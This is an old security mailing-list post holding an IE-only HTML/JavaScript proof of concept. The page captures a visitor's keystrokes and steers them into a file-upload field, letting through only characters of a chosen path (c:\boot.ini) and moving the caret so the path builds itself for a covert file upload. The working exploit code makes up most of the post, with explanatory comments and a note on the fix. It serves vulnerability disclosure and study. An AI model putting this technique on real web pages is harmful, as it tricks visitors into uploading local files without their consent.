Message-ID: <44885061.5020106@gmx.net>
Date: Thu Jun  8 17:27:06 2006
From: obliv at gmx.net (Bart van Arnhem)
Subject: file upload widgets in IE and Firefox have
	issues

Here is another proof of concept, for IE only. It allows the characters 
to be entered in an arbitrary order, since it repositions the caret to 
make each character drop into the right place.
Just open this HTML in IE and bash on the keyboard a bit.

- Bart

<html>
    <head>
        <script type="text/javascript">
            // Proof of concept: a page steers the visitor's own keystrokes into the
            // editable path field of <input type="file"> so that a chosen path ends up
            // in it. The script never assigns the input's value; every character comes
            // from a real keypress that the handlers below either accept or cancel.
            // Defender's note: the weakness shown is in the browser widget (script may
            // focus the file input and move its caret while the user is typing); the
            // robust fix is a path field that only the native file chooser can fill.

            // Path the handlers try to assemble in the file input.
            var targetFile = "c:\\boot.ini";
       
            // State is set up once the document has loaded. tempFilled, tempDone,
            // origPos and tempPos are assigned without `var`, so they are implicit
            // globals.
            window.onload = function ()
            {
                // tempFilled: one "\x01" placeholder per character of targetFile
                // (joining length+1 empty slots yields `length` separators).
                tempFilled = new Array(targetFile.length + 1).join("\x01");
                // tempDone: upper-cased copy of the target. Characters still needed
                // remain; each consumed one is overwritten with "\x01" further down.
                tempDone = targetFile.toUpperCase();
               
                // Blur the file input after every key release.
                // NOTE(review): presumably so the field does not keep visible focus
                // between keystrokes; the post does not state the intent.
                document.getElementById("target").onkeyup = function () 
{ this.blur(); };

                // Decide, per keypress, whether the typed character is let through
                // and where in the field it lands.
                document.getElementById("target").onkeypress = function (e)
                {
                    // Fall back to window.event when no event argument is passed.
                    if (!e) e = window.event;
                   
                    // Compare case-insensitively: both sides are upper-cased.
                    var pressed = 
String.fromCharCode(e.keyCode).toUpperCase();
                   
                    // origPos: index of the first still-needed occurrence of the
                    // typed character in the target, or -1 if it is not needed.
                    if ((origPos = tempDone.indexOf(pressed)) !== -1)
                    {
                        // Record the character at its final position ...
                        tempFilled = tempFilled.substr(0, origPos) + 
pressed + tempFilled.substr(origPos + 1);
                        // ... and mark that occurrence as consumed (replace() with a
                        // string pattern only touches the first match).
                        tempDone = tempDone.replace(pressed, "\x01");
                       
                        // Placeholders left of origPos are characters not yet typed,
                        // so they are absent from the field; subtracting them gives
                        // the caret offset inside the text actually present.
                        var matches = tempFilled.substr(0, 
origPos).match(/\x01/g);
                        tempPos = origPos - (matches == null ? 0 : 
matches.length);

                        // createTextRange() is the legacy IE text-range API (the post
                        // says the demo is IE only): collapse to the start of the
                        // field, advance tempPos characters, and select() to put the
                        // caret there before the character is inserted.
                        var range = 
document.getElementById("target").createTextRange();
                        range.collapse(true);
                        range.move("character", tempPos);
                        range.select();

                        // Accept the keystroke.
                        return true;
                    }

                    // Character not needed (or already consumed): cancel it.
                    return false;
                }

                // Any key pressed anywhere in the document moves focus to the file
                // input first, so the keypress that follows is delivered to it.
                document.onkeydown = function () { 
document.getElementById("target").focus() };

            }
        </script>       
    </head>
    <body>
        <form method="post" action="">
            <input type="file" id="target" />
        </form>
    </body>
</html>
